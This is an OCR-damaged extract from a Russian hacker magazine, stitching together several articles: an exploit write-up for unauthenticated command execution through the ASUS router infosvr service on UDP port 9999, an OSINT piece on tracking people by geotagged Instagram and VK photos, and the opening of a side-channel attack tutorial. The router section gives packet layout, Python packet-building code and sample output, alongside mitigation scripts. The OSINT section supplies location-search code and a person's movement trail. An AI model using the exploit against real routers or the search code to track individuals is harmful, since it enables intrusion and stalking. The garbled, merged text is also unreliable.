книги хакеры / журнал хакер / 193_Optimized

440syscmd = (PKT_SYSCMD *)

(pdubuf+sizeof(IBOX_COMM_ PKT_HDR_EX));

...

445syscmd->len=strlen(syscmd->cmd);

446fprintf(stderr,"system cmd: %d %s\n", syscmd->len, syscmd->cmd);

447#if 0

...

512#endif

513{

514sprintf(cmdstr, "%s > /tmp/ syscmd.out", syscmd->cmd);

515system(cmdstr);

Если атакующий сможет указать значение NET_CMD_ID_MANU_ CMD, то предыдущий блок обработает пакет и преобразует в структуру PKT_SYSCMD, где все части syscmd будут под полным контролем атакующего. Вследствие чего мы можем выполнить произвольный код, результат которого запишется во временный файл, прочитается и отправится обратно по адресу инициализирующего пакета.

EXPLOIT

На GitHub выложен один Python-скрипт (bit.ly/1ycYZFH) под данную уязвимость, но, судя по структуре, автор будет пополнять этот репозиторий.

Отправляем пакет со следующим содержимым:

ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

PacketType [byte] ; NET_PACKET_TYPE_CMD

OpCode [word] ; NET_CMD_ID_MANU_CMD

Info [dword] ; Комментарий: "Or Transaction ID"

MacAddress [byte[6]] ; Двойная неправильная проверка

; с помощью memcpy вместо memcmp

Password [byte[32]] ; Не проверяется

Length [word] ; Длина

Command [byte[420]] ; 420 байт в структуре, 256 – 19

;не используемых = 237 доступных

Врезультате получаем следующий запрос:

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\

x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).

ljust(512, b'\x00')

Обрабатываем пакет...

ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

PacketType [byte] ; NET_PACKET_TYPE_RES

OpCode [word] ; NET_CMD_ID_MANU_CMD

Info [dword] ; Аналогично с отправленным

MacAddress [byte[6]] ; Заполнено нами

Length [word] ; Длина

Result [byte[420]] ; Actually returns that amount

...с помощью такого кода:

while True:

data, addr = sock.recvfrom(512)

if len(data) == 512 and data[1] == 22:

break

length = struct.unpack('<H', data[14:16])[0]

s = slice(16, 16+length)

sys.stdout.buffer.write(data[s])

$ ./asus-cmd "nvram show | grep -E

'(firmver|buildno|extendno)'"

[*] sent command: nvram show | grep -E

'(irmver|buildno|extendno)'

[!]received 512 bytes from 10.0.0.2:37625 0c 15 0033 54ab7bc4 41:41:41:41:41:41

0031 nvram show | grep -E '(irmver|buildno|extendno)'

[!]received 512 bytes from 10.0.0.1:9999

0c 16 0033 54ab7bc4 xx:xx:xx:xx:xx:xx

004e buildno=376

extendno_org=2524-g0013f52

extendno=2524-g0013f52

irmver=3.0.0.4

TARGETS

Протестировано на устройствах:

•RT-N66U 3.0.0.4.376_1071-g8696125;

•RT-AC87U 3.0.0.4.378_3754;

•RT-N56U 3.0.0.4.374_5656.

SOLUTION

Есть исправление от производителя. Также можно воспользоваться следующим патчем. По умолчанию стоковая прошивка от ASUS не позволяет запускать произвольные скрипты при загрузке устройства, но при этом позволяет запускать скрипты в любое время при монтировании USB. Логинимся на устройстве через Telnet или SSH:

nvram set script_usbmount="/jffs/scriptname"

nvram commit

И создаем файл со следующим содержимым:

#!/bin/sh

iptables -I INPUT -p udp --dport 9999 -j DROP

Другой путь — просто завершить уязвимый процесс.

#!/bin/sh

for pid in `ps -w | grep infosvr | grep -v grep |

awk '{print $1}'`

do

echo "killing $pid"

kill $pid

done

Сохраняем файл с именем, указанным в переменной script_ usbmount, и исполняем файл (или просто перезагружаем роутер). Ну и не забываем, что триггером служит монтирование USBустройства, поэтому, если такого нет, советуем приобрести :).

Пример взлома ASUSроутера с помощью asus-cmd эксплойта

Я тебя по сетям вычислю

Bloomua@shutterstock.com

ИСПОЛЬЗУЕМ API КРУПНЕЙШИХ

СОЦСЕТЕЙ В СВОИХ КОРЫСТНЫХ ЦЕЛЯХ

Ни для кого не секрет, что современные социальные сети представляют собой огромные БД, содержащие много интересной информации о частной жизни своих пользователей.

Через веб-морду особо много данных не вытянешь, но ведь у каждой сети есть свой API... Так давай же посмотрим, как этим можно воспользоваться для поиска пользователей и сбора информации о них.

OSINT

CREEPY

Одна из наиболее популярных — Creepy (goo.gl/tQupIy). Она предназначена для сбора геолокационной информации о пользователе на основе данных из его аккаунтов Twitter, Instagram, Google+ и Flickr. К достоинствам этого инструмента, который штатно входит в Kali Linux, стоит отнести понятный интерфейс, очень удобный процесс получения токенов для ис-

Взлом

Я тебя по сетям вычислю

+"&count=" + 100

+"&radius=" + distance

+"&start_time=" + timestamp

+"&end_time=" + (timestamp + date_increment)

Здесь используемые переменные:

•location_latitude — географическая широта;

•location_longitude — географическая долгота;

•distance — радиус поиска;

•timestamp — начальная граница интервала времени;

•date_increment — количество секунд от начальной до конечной границы интервала времени;

•access_token — токен разработчика.

Как выяснилось, для доступа к Instagram API требуется access_token. Получить его несложно, но придется немного заморочиться (смотри врезку). «Контакт» же более лояльно относится к незнакомцам, что очень хорошо для нас.

АВТОМАТИЗИРУЕМПРОЦЕСС

Итак, мы научились составлять нужные запросы, но вручную разбирать ответ сервера (в виде JSON/XML) — не самое крутое занятие. Гораздо удобнее наваять небольшой скриптик, который будет делать это за нас. Использовать мы будем опять же Python 2.7. Логика следующая: мы ищем все фото, которые попадают в заданный радиус относительно заданных координат в заданный промежуток времени. Но учитывай один очень важный момент — выводится ограниченное количество фотографий. Поэтому для большого промежутка времени придется делать несколько запросов с промежуточными интервалами времени (как раз date_increment). Также учитывай погрешность координат и не указывай радиус в несколько метров. И не забывай, что время нужно указывать в timestamp.

Начинаем кодить. Для начала подключим все необходимые нам библиотеки:

import httplib

import urllib

import json

import datetime

Пишем функции для получения данных с API через HTTPS. С помощью переданных аргументов функции мы составляем GET-запрос и возвращаем ответ сервера строкой.

def get_instagram(latitude, longitude, distance,

min_timestamp, max_timestamp, access_token):

+ str(min_timestamp)

get_request += '&max_timestamp='

+ str(max_timestamp)

get_request += '&access_token='

+ access_token

local_connect = httplib.HTTPSConnection

('api.instagram.com', 443)

local_connect.request('GET', get_request)

return local_connect.getresponse().read()

def get_vk(latitude, longitude, distance,

ПОЛУЧЕНИЕ

INSTAGRAM ACCESS TOKEN

Для начала регистрируешься в «Инстаграме». После регистрации переходишь по следующей ссылке:

http://instagram.com/developer/clients/manage/

Жмешь Register a New Client. Вводишь номер телефона, ждешь эсэмэску и вводишь код. В открывшемся окне создания нового клиента важные для нас поля нужно заполнить следующим образом:

•OAuth redirect_uri: http://localhost/

•Disable implicit OAuth: галочка должна быть снята

Остальные поля заполняются произвольно. Как только все заполнил, создавай нового клиента. Теперь нужно получить токен. Для этого впиши в адресную строку браузера следующий URL:

https://instagram.com/oauth/authorize/?client_id=[CLIENT_

ID]&redirect_uri=http://localhost/&response_type=token

где вместо [CLIENT_ID] укажи Client ID созданного тобой клиента. После этого делай переход по получившейся ссылке, и если ты сделал все правильно, то тебя переадресует на http://localhost и в адресной строке как раз будет написан Access Token.

http://localhost/#access_token=[Access Token]

Более подробно про этот метод получения токена можешь почитать по следующей ссылке: jelled.com/instagram/access-token.

local_connect.request('GET', get_request)

return local_connect.getresponse().read()

Еще накодим небольшую функцию конвертации timestamp в человеческий вид:

def timestamptodate(timestamp):

return datetime.datetime.

fromtimestamp(timestamp).

strftime('%Y-%m-%d %H:%M:%S')+' UTC'

Теперь пишем основную логику поиска картинок, предварительно разбив временной отрезок на части, результаты сохраняем в HTML-файл. Функция выглядит громоздко, но основную сложность в ней составляет разбиение временного интервала на блоки. В остальном это обычный парсинг JSON и сохранение нужных данных в HTML.

def parse_instagram(location_latitude,

location_longitude, distance, min_timestamp,

max_timestamp, date_increment, access_token):

print 'Starting parse instagram..'

print 'GEO:',location_latitude,location_longitude

print 'TIME: from',timestamptodate

(min_timestamp),'to',timestamptodate

(max_timestamp)

ile_inst = open('instagram_'+location_

latitude+location_longitude+'.html','w')

ile_inst.write('<html>')

Взлом

55.7736147,37.6567926 30 Apr 2014

19:15 MSK;

55.4968379,40.7731697 30 Apr 2014

23:00 MSK;

55.5625259,42.0185773 1 May 2014

00:28 MSK;

55.5399274,42.1926434 1 May 2014

00:46 MSK;

55.5099579,47.4776127 1 May 2014

05:44 MSK;

55.6866654,47.9438484 1 May 2014

06:20 MSK;

55.8419686,48.5611181 1 May 2014

07:10 MSK

Первым делом мы, естественно, посмотрели, каким местам соответствуют эти координаты. Как оказалось, это станции РЖД, причем первая координата —

ПОЛЕЗНЫЕ СОВЕТЫ

Если в результате работы скрипта фотографий будет слишком мало, можешь пробовать изменять переменную date_increment, поскольку именно она отвечает за интервалы времени, по которым собираются фотографии. Если место популярное, то и интервалы должны быть частыми (уменьшаем date_increment), если же место глухое и фотографии публикуют раз в месяц, то и сбор фотографий интервалами в час не имеет смысла (увеличиваем date_increment).

ВЫВОДЫ

Статья подошла к завершению, и настало время делать вывод. А вывод простой: заливать фотографии с геопривязкой нужно обдуманно. Конкурентные разведчики готовы зацепиться за любую возможность получить новую информацию, и API социальных сетей им в этом могут очень неплохо помочь. Когда писал эту статью, я изучил еще несколько сервисов, в том числе Twitter, Facebook и LinkedIn, — есть ли подобный функционал. Положительные результаты дал только первый, что, несомненно, радует. А вот Facebook и LinkedIn огорчили, хотя еще не все потеряно и, возможно, в будущем они расширят свои API. В общем, будь внимательнее, выкладывая свои фото с гео­привязкой, — вдруг их найдет ктонибудь не тот :).

Роман Коркикян roman.korkikian@yandex.com

АТАКИ ПО ВТОРОСТЕПЕННЫМ КАНАЛАМ ДЛЯ «УВЕРЕННЫХ»

.

Эта статья представляет собой пошаговую инструкцию для тех, кто на практике решил попробовать применить атаки по второстепенным каналам (АВК). Для этой цели мы напишем код на Python, а данные возьмем из соревнований DPA contest, которые предварительно были объединены и сжаты в один файл (файл размещен в Сети). Мы будем анализировать алгоритм DES, реализованный не в софте, а аппаратно и без какой-либо защиты от АВК. Перед тем как приступить к практике, я настоятельно рекомендую озна-

комиться с двумя предыдущими статьями (][ № 189 и № 191).